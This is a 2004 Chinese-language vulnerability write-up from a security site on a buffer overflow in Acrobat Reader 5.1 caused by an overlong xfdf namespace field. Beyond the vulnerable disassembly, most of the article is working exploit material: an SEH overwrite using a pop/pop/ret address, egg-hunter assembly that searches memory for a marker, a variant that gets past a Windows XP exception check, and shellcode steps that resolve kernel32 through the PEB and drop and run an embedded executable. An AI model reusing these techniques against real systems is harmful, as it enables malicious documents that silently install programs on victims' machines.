首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞检测>文章内容
Acrobat Reader5.1漏洞分析
来源:vfocus.net 作者:vfocus 发布时间:2004-05-22  

Acrobat Reader5.1漏洞分析


只对Acrobat Reader 5.1有效
在一个xdf文件里放入一个超长的<xfdf xmlns>段,会造成溢出

问题代码
001B:2200E249 55 PUSH EBP
001B:2200E24A 8BEC MOV EBP,ESP
001B:2200E24C 81EC40010000 SUB ESP,00000140 //分配0x140长度
001B:2200E252 53 PUSH EBX
001B:2200E253 56 PUSH ESI
001B:2200E254 57 PUSH EDI
001B:2200E255 6A01 PUSH 01
001B:2200E257 6A05 PUSH 05
001B:2200E259 33DB XOR EBX,EBX
001B:2200E25B FF7508 PUSH DWORD PTR [EBP+08]
001B:2200E25E 8D4DFC LEA ECX,[EBP-04]
001B:2200E261 895DFC MOV [EBP-04],EBX
001B:2200E264 E839470500 CALL 220629A2
001B:2200E269 A1542D0A22 MOV EAX,[220A2D54]
001B:2200E26E 53 PUSH EBX
001B:2200E26F FF75FC PUSH DWORD PTR [EBP-04]
001B:2200E272 FF5064 CALL [EAX+64]
001B:2200E275 59 POP ECX
001B:2200E276 59 POP ECX
001B:2200E277 50 PUSH EAX
001B:2200E278 8D85C0FEFFFF LEA EAX,[EBP-0140]
001B:2200E27E 682C4D0922 PUSH 22094D2C
001B:2200E283 50 PUSH EAX
001B:2200E284 FF1564F20822 CALL [MSVCRT!sprintf] //不安全调用sprintf造成溢出
001B:2200E28A 83C40C ADD ESP,0C
001B:2200E28D 8D85C0FEFFFF LEA EAX,[EBP-0140]
001B:2200E293 50 PUSH EAX
001B:2200E294 FF15FCF00822 CALL [KERNEL32!OutputDebugStringA]
001B:2200E29A FF75FC PUSH DWORD PTR [EBP-04]
001B:2200E29D 8B7510 MOV ESI,[EBP+10]
001B:2200E2A0 56 PUSH ESI
001B:2200E2A1 E8D7110000 CALL 2200F47D //call里面会产生异常

分配缓冲区为0X140大小,spfintf时没有做长度检查,导致溢出。可以覆盖ret和异常处理函数
最近的ret在2200e697,相差上千字节,太远,不考虑

于是覆盖异常处理地址,异常处理函数链表
12ed30
12ef3c
12f0e0
12f598
12ff04
12ffb0
12ffe0

覆盖第一个函数12ed30,改为pop esi,pop eax,ret(5e 5f c3)的地址774a295a,之前的4个字节改为
push ecx 51
pop ecx 59
pop eax 58 //这里正好把context的头指针给了eax,后面会用到
push 774a295a 68 //这里正好把返回地址774a295a跳过,运行后面的指令
跳过774a295a之后,是shellcode
经过几次JAE跳转,跳到不限制可见字符的地方,只有160个字节左右可用,用这段字节来搜索内存,标志为LLEE,找到真正的shellcode(放在xdf文件后面)

搜索内存代码1
jmp excep1

excep2:
mov ecx,fs:[0] //接管异常
push ecx
mov fs:[0],esp
mov edx,0x45454c4d //LLEE
dec edx
mov eax,esi

next:
inc eax //搜索内存
cmp [eax],edx
jz find
jmp next

find:
add eax,4 //找到,跳转
jmp eax

excep1:
call excep2

mov edx,[esp+0xc]
xor ebx,ebx
mov bl,1
shl ebx,0x0c
add [edx+0xb0],ebx
xor eax,eax
ret

经实验发现这种搜索内存的方法在XP下不起左右,因为XP的异常处理比2K多了一个检测,
001B:77F978D1 8B4304 MOV EAX,[EBX+04] //EAX为异常结构链的第一个函数的地址,即上面的excep1
001B:77F978D4 3B45FC CMP EAX,[EBP-04]
001B:77F978D7 7209 JB 77F978E2
001B:77F978D9 3B45F8 CMP EAX,[EBP-08] //[EBP-08]为0x00140000,是从FS:[4]中取出,stackbase
001B:77F978DC 0F82A8000000 JB 77F9798A //可见当异常处理函数小于stackbase时,将不会调用函数(栈不可执行?)

所以为了兼容XP改用以下搜索内存的方法来完成

mov edx,[esp+8] //esp+8正好是以前的异常结构链的第一个链
mov fs:[0],edx //因为此时fs:0已经被系统自动修改了,所以这里将原来的处理函数放入FS:0,这样发生异常是还回到这里
mov eax,[eax+0xb0] //[eax+0xb0]是context.eax,经过之前的几次pop和push,此时eax正好指向原来的esp+c,即context
mov edx,0x45454c4d //之后正常搜索,当搜索到无效页面时,还会回到这里,此时将eax加0x1000,继续搜索
dec edx
add eax,0x1000
next:
inc eax
cmp [eax],edx
jz find
jmp next
find:
add eax,4
jmp eax


找到真正的SHELLCODE后,通过PEB得到KERNEL32.DLL的基址(98下需要另外处理),之后得到各个API的地址
mov eax,fs:0x30
mov eax,[eax+0x0c]
mov esi,[eax+0x1c]
lodsd
mov eax,[eax+0x08]
之后打开自身文件,通过指定的文件偏移,将exe文件存入system32p.exe,并执行。



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·MS07-014调试手记
·udp_sendmsg空指针漏洞分析
·一段对perl 木马的分析
·小心我“DIR”溢出你!
·CVE-2010-4258漏洞分析
·Adobe Reader 'CoolType.dll' TT
·PHPBB<+2.0.10 漏洞说明
·袁哥写的漏洞研究方法总结
·利用异常处理执行shellcode实例
·注入点检测新方法
·Apache mod_ssl buffer over分析
·RPC漏洞的通用分析方法
  相关文章
·Win2k LDT漏洞初探
·windows溢出随笔
·AIX捉虫记之invscoutd
·分析ms locator vul
·分析server-u site chmod 漏洞
·Apache mod_ssl buffer over分析
·Serv-U MDTM命令远程溢出分析
·雪人论坛的Sql Injection的漏洞
·袁哥写的漏洞研究方法总结
·Ofstar和phpind论坛安全性分析
·水晶论坛(WDB)安全性分析
·高级WIN2K ROOTKIT检测技术
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved